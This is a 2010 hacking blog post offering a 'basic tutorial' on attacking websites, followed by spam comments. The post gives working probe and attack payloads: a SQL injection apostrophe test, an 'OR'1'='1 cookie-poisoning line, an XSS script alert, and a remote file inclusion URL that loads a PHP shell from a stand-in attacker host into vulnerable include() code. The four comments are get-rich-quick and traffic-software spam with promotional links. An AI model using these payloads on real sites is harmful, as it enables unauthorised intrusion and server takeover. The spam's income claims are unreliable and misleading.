Wednesday, 2018-02-21, 7:59 AM


Main
Registration
Login
My site Welcome Guest | RSS  
Site menu

Section categories
./Hacking [2]
./News [4]
./Exploit [0]
./Uncategories [0]

Our poll
Rate my site
Total of answers: 1

Statistics

Total online: 1
Guests: 1
Users: 0

Login form

Main » 2010 » June » 19 » Hack Websites & pentesting websites [basic tutorial]
6:55 PM
Hack Websites & pentesting websites [basic tutorial]
Hack Websites & pentesting websites [basic tutorial]
1. Check for robots.txt
Most common directory is
       
   
Kode:
http://www.site.com/robots.txt
   
       

This can contain lots of info, even though not all sites have it. It can normally indicate where the admin directory is too.
robots.txt is used to restrict the Google bot's access in certain parts of a forum or a website.

It looks like this:
       
   
Kode:
User-agent: *

Disallow: /forum/admin.php
Disallow: /forum/moderator.php
Disallow: /forum/include.php
   
       


2. Check for SQL Injection vulnerabilities
This is done by putting a ' (apostrophe) in the end.
Like this:
       
   
Kode:
http://www.site.com/news.php?id=1'
   
       

If you see some kind of an error, then most likely, the site is vulnerable.
This is classic, or error based SQL Injection. We'll discuss blind SQL injection another time.


3. Cookie poisoning
Even though most sites nowadays filter this, it wouldn't kill you to try.
We will do this...with javascript.
It's really simple, try this in the address bar:
       
   
Kode:
javascript:alert(document.cookie);
   
       

In some cases this may spill out your username and password.
This is the part where you try the famous line...
       
   
Kode:
javascript:void(document.cookie="username='OR'1'=' 1"); void(document.cookie="password='OR'1'='1");
   
       

Similar to SQL injection, you guessed it.


4. Check if site is vulnerable to Cross Site Script (XSS)
XSS and javascript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this in a webform or something.
       
   
Kode:
<script>alert("awdwdadwd")</script>
   
       

If site is vulnerable, then you will get a popup message saying awdwdadwd (yes this was random).
You can find more detailed articles on XSS on milw0rm or something.


5. Remote File Inclusion (RFI) -- My Fav!
RFI or Remote File Inclusion is where the attacker tries to inject his own PHP code to your PHP apps...and if he's successful, then he can do whatever he wants on the server.
Ok, so, lets say we have a website coded in PHP and it uses something like page=page.html to see which page is to be displayed. The code will look something like this
       
   
Kode:
  $file =$_GET['page']; //ourpage
  include($file);
?>
   
       

What this means is, whatever gets passed to page, it will get included inside the PHP page. Goes like this:
       
   
Kode:
http://www.website.com/contact.php?page=http://www.hackersite.com/phpshell.txt?
   
       

The actual code the webserver is executing looks like this:
       
   
Kode:
  $file ="http://www.hackersite.com/phpshell.txt?"; //$_GET['page'];
  include($file); //$file is the PHP shell
?>
   
       

We just executed our code on our targeted server.
Well this was all folks, hope you enjoyed
Category: ./Hacking | Views: 5772 | Added by: Xhyn00b13 | Tags: Hacking | Rating: 0.0/0
Total comments: 4
4  
After getting more than 10000 visitors/day to my website I thought your xhyn00b13.ucoz.com website also need unstoppable flow of traffic...

Use this BRAND NEW software and get all the traffic for your website you will ever need ...

= = > > http://mass-autopilot-traffic.net

In testing phase it generated 867,981 visitors and $540,340.

Then another $86,299.13 in 90 days to be exact. That's $958.88 a
day!!

And all it took was 10 minutes to set up and run.

But how does it work??

You just configure the system, click the mouse button a few
times, activate the software, copy and paste a few links and
you're done!!

Click the link BELOW as you're about to witness a software that
could be a MAJOR turning point to your success.

= = > > http://mass-autopilot-traffic.net

3  
After getting more than 10000 visitors/day to my website I thought your xhyn00b13.ucoz.com website also need unstoppable flow of traffic...

Use this BRAND NEW software and get all the traffic for your website you will ever need ...

= = > > http://mass-autopilot-traffic.com

In testing phase it generated 867,981 visitors and $540,340.

Then another $86,299.13 in 90 days to be exact. That's $958.88 a
day!!

And all it took was 10 minutes to set up and run.

But how does it work??

You just configure the system, click the mouse button a few
times, activate the software, copy and paste a few links and
you're done!!

Click the link BELOW as you're about to witness a software that
could be a MAJOR turning point to your success.

= = > > http://mass-autopilot-traffic.com

2  
After getting more than 10000 visitors/day to my website I thought your xhyn00b13.ucoz.com website also need unstoppable flow of traffic...

Use this BRAND NEW software and get all the traffic for your website you will ever need ...

= = > > http://auto-massive-traffic.net

In testing phase it generated 867,981 visitors and $540,340.

Then another $86,299.13 in 90 days to be exact. That's $958.88 a
day!!

And all it took was 10 minutes to set up and run.

But how does it work??

You just configure the system, click the mouse button a few
times, activate the software, copy and paste a few links and
you're done!!

Click the link BELOW as you're about to witness a software that
could be a MAJOR turning point to your success.

= = > > http://auto-massive-traffic.net

1  
Hi, This just came across my desk and I had to pass it on to you ASAP…
Internet multi-millionaire Mack Michaels has a few new positions available right now…
If accepted you can easily rake in $11, 917 per month starting from scratch.
==> http://www.maverickmoneymaking.info/maverick.html
Once you’re accepted just follow the training Mack gives you. It’s really quite simple…
Learn how Mack went from not being able to afford Christmas gifts to a millionaire lifestyle and how you can too!
BUT…
Due to the extremely high level of Hands-On time Mack spends with every new member he has to limit the number of positions that are open.
Right now there are only 2 available in your area. If you’re interested you should move quickly.
==> http://www.maverickmoneymaking.info/maverick.html
Your Friend, – Mike

Name *:
Email *:
Code *:
Search

Calendar
«  June 2010  »
SuMoTuWeThFrSa
  12345
6789101112
13141516171819
20212223242526
27282930

Entries archive

Site friends
  • Create a free website

  • Copyright MyCorp © 2018